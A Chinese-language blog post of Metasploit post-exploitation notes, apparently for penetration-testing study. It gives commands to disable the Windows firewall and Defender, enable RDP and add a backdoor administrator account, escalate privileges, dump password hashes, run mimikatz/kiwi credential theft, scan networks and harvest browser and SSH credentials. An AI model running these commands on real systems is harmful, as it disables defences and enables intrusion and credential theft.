1. msf通过shell关闭防火墙

  Netsh advfirewall set allprofiles state off(关闭防火墙)
  Netsh advfirewall show allprofiles (查看防火墙状况)

  

  通过策略添加防火墙规则规避行为(设置某个端口的行为不被防火墙所约束,相当于加入白名单)
  netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=3333 action=allow
  netsh firewall add portopening TCP 3333 "VMWARE" ENABLE ALL
  重启生效
  shutdown -r -f -t 0
  -f:强制重启
  -t :时间为0,立即重启

2、关闭杀毒软件

  关闭windefend:net stop windefend
  关闭杀毒软件(msf自带的两个模块,其实没什么用,windows的杀软一般不能通过这种方式关闭)
    run killav
    run post/windows/manage/killav

3、打开并连接3389

  ①:通过MSF里面的自带模块可以打开3389的端口
    run  post/windows/manage/enable_rdp
    run getgui -e
  ②:可以利用MSF模块命令,在目标机器上添加用户:
    run  getgui -u admin -p admin
    -u:用户名
    -p:密码(注意windows服务器有密码强度的规范)
  ③:将添加的用户添加到用户组:
    net localgroup administrators admin /add
  ④:远程桌面连接
    在windows中:mstsc——>打开远程桌面连接
  

    在linux中:rdesktop——>redesktop -u username -p password ip
  ⑤:查看远程桌面:
    use espia
    screenshot
    screengrab
    screenshare

  

  ⑥:删除指定账号:
    Run post/windows/manage/delete_user USERNAME=admin

4、 Hashdump

  从我们的系统文件的sam文件中,去获取去解析,去读取里面的hash值,然后输出出来。前提:需要一个管理员的权限(system权限)
      ①. getsystem:提权命令,得到一个system权限
      ②. getuid:显示主机上运行meterpreter 服务的用户
      ③. hashdump:有可能会报错,提示权限不够
      ④. ps:找到一个user为system权限的PID
      ⑤. getpid:查看到当前的pid为XX
      ⑥. Migrate pid:进程的迁移 ,将当前的进程迁移到一个nt/system权限的进程当中。就获得到一个这个进程id的权限,预览从普通文件系统进行的完全迁移
      ⑦. hashdump:成功获取到hash值

5、 hash值的结构

  用户名称:RID:LM-HASH 值:NT-HASH值
  rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administrator,501为guest等。
  而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不一样。

6、 mimikatz的部分功能

  Load mimikatz
  mimikatz_command -h
  mimikatz_command -f a::              //指定使用的模块
  mimikatz_command -f samdump::hashes          //跟上面一样,在sam文件中dump出hash值
  Mimikatz_command -f samdump::bootkey
  这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 既然提高了kiwi我们来看看kiwi怎么用
  

  meterpreter >help kiwi #查看帮助
  Kiwi Commands
  Command                           Description
  creds_all                            #列举所有凭据/所有的系统密码
  creds_kerberos                             #列举所有kerberos凭据
  creds_msv                         #列举所有msv凭据
  creds_ssp                          #列举所有ssp凭据
  creds_tspkg                      #列举所有tspkg凭据
  creds_wdigest                 #列举所有wdigest凭据
  dcsync                              #通过DCSync检索用户帐户信息
  dcsync_ntlm                    #通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create   #创建黄金票据
  kerberos_ticket_list        #列举kerberos票据
  kerberos_ticket_purge   #清除kerberos票据
  kerberos_ticket_use       #使用kerberos票据
  kiwi_cmd                          #kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
  lsa_dump_sam                  #dump出lsa的SAMlsa_dump_secrets       #dump出lsa的密文
  password_change           #修改密码
  wifi_list                             #列出当前用户的wifi配置文件
  wifi_list_shared             #列出共享wifi配置文件/编码

7、 Scraper

  集成的信息收集的模块,在我们的目标机器上执行,收集的信息保存在文件夹下面
  run scraper
  /root/.msf4/logs/scripts/scraper
  

  

8、Winenum

  收集信息的命令
  Run winenum
  /root/.msf4/logs/scripts/winenum

  

9、 MSF主机发现

  模块位于源码路径的modules/auxiliary/scanner/discovery/
  主要有:
  arp_sweep           //通过使用arp请求枚举本地局域网中所有活跃的主机
  use auxiliary/scanner/discovery/arp_sweep
  set RHOSTS 10.10.21.0/24
  set THREADS 50
  Run
  设置好参数后启动扫描器
  

  udp_sweep             //通过发送udp数据包探查指定主机是否活跃,并发现主机上的udp服务
  ipv6_mulitcast_ping
  ipv6_neighbor
  ipv6_neighbor_router_advertisement
  udp_probe

10、MSF端口扫描

  msf> search portscan
  auxiliary/scanner/protscan/ack       //通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测    
  auxiliarv/scanner/protscan/ftpbounce   //通过FTPbounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很好的防范此攻击,但在旧的系统上仍可以被利用
  auxiliary/scanner/portscan/syn              //使用发送TCPSYN标志的方式探测开放端口,类似于nmap -sS
  auxiliary/scanner/protscan/tcp              //通过一次完整的TCP连接来判断端口是否开放最准确但是最慢
  auxilliarv/scanner/nrotscan/xmas          //一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤

  一般情况下推荐使用syn端口扫描器,速度较快,结果准确,不易被对方察觉
  syn扫描器的使用
  >use auxiliary/scanner/portscan/syn     
  >set RHOSTS 10.10.10.10/24                //设置要扫描的ip网段
  >set THREADS 20                                     //线程,同时扫描的话,越多越快
  >run
  

11、其他

  确定目标主机是否为虚拟机

  Run checkvm

  

  获取目标主机上的软件安装信息
  run post/windows/gather/enum_applications

  

  获取目标主机上最近访问过的文档,链接信息
  run post/windows/gather/dumplinks
  查看目标环境信息:
  run post/multi/gather/env

  

  查看firefox中存储的账号密码:
  run post/multi/gather/firefox_creds
  查看ssh账号密码的密文信息,证书信息
   run post/multi/gather/ssh_creds
  搜索其他的模块——search

  

MSF内网信息收集的更多相关文章

  1. MSF 内网渗透笔记

    进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControl ...

  2. MSF内网渗透 扫描模块

    端口扫描 auxiliary/scanner/portscan scanner/portscan/ack        ACK防火墙扫描 scanner/portscan/ftpbounce  FTP ...

  3. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

  4. Vulnstack内网靶场1

    最近发现了一个内网的靶场网站,简单配置一下网络就可以,不用自己搭建这么麻烦漏洞信息 (qiyuanxuetang.net) 环境配置 内网1靶场由三台机器构成:WIN7.2008 server.200 ...

  5. Vulnstack内网靶场2

    环境配置 内网2靶场由三台机器构成:WIN7.2008 server.2012 server 其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控 网络适配器已经设置好了不用自 ...

  6. Vulnstack内网靶场4

    环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器 攻击机kali ...

  7. Vulnstack内网靶场5

    实验环境搭建 漏洞详情 (qiyuanxuetang.net) "此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集.Web攻防.代码审计.漏洞利用. ...

  8. 内网hash传递

    前言: 我们在平常打点的时候,遇到有内网或者有域的环境的时候,我们只获得了内网中的一台机子的shell,由这台机子我们可以获得这台机子所在的网段的相关其他主机.比如说有域的时候的域控机,有多层内网的堡 ...

  9. CS内网横向移动 模拟渗透实操 超详细

    @Webkio 前言: 最近在跟朋友搞一些项目玩,所以最近没怎么更新内容接下来我将在虚拟中模拟内网多层靶场,进行内网渗透实验,超详细,适合小白.本文仅供网安学习,不可利用于未授权渗透工作中,否则后果自 ...

  10. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

随机推荐

  1. 【LeetCode链表#9】图解:两两交换链表节点

    两两交换链表中的节点 力扣题目链接(opens new window) 给定一个链表,两两交换其中相邻的节点,并返回交换后的链表. 你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换. 思路 ...

  2. 今天学到的新知识--使用localtunnel实现内网穿透,感觉很神奇哇~~

    localtunnel 是一个基于 nodejs 的内网穿透工具.通过简单的安装可以实现将内网里的设备的某个端口暴露在公网中以提供服务. 首先你电脑要有node环境 使用本地隧道,对应本地服务的端口号 ...

  3. Flutter新版本2.X系列--01创建项目

    1.新建项目,打开Android studio,点击红圈部分 2.选择第一个 3.设置你的项目名称,flutter sdk位置,以及项目存储路径 4.设置包名,这个要唯一 5.好啦 ~ 作为一名前端开 ...

  4. 网络爬虫及openyxl模块

    网络爬虫及openyxl模块 一.第三方模块简介 1.第三方模块的用处 python之所以在这么多的编程语言中脱颖而出的优点是有众多的第三方库函数,可以更高效率的实现开发 2.第三方模块的使用 1.第 ...

  5. react 高效高质量搭建后台系统 系列 —— 系统布局

    其他章节请看: react 高效高质量搭建后台系统 系列 系统布局 前面我们用脚手架搭建了项目,并实现了登录模块,登录模块所依赖的请求数据和antd(ui框架和样式)也已完成. 本篇将完成系统布局.比 ...

  6. SQLSERVER 的四个事务隔离级别到底怎么理解?

    一:背景 1. 讲故事 在有关SQLSERVER的各种参考资料中,经常会看到如下四种事务隔离级别. READ UNCOMMITTED READ COMMITTED SERIALIZABLE REPEA ...

  7. Task记录3 :ContinueWith ,CancellationToken,的结合

    static void Main(string[] args) { //1.创建取消令牌数据 CancellationTokenSource tokenSource = new Cancellatio ...

  8. Java堆外缓存(一个很有意思的应用)

    我们在开发过程中会遇到这样的场景:就是一个服务的各项 JVM 的配置都比较合理的情况下,它的 GC 情况还是不容乐观.分析之后发现有 2 个对象特别巨大,占了总存活堆内存的 90%以上.其中第 1 大 ...

  9. vue-cli环境搭建 (超详细保姆级教程)

    一.使用之前,我们先来掌握3个东西是用来干什么的. npm: Nodejs下的包管理器. webpack: 它主要的用途是通过CommonJS的语法把所有浏览器端需要发布的静态资源做相应的准备,比如资 ...

  10. app实现外部浏览器打开链接

    需求:安卓和IOS开发的混合app.前端使用vue,vant2,安卓使用java,ios使用的object-c.实现效果:点击按钮,下载PDF附件,app跳转到手机外部浏览器,下载附件...... 1 ...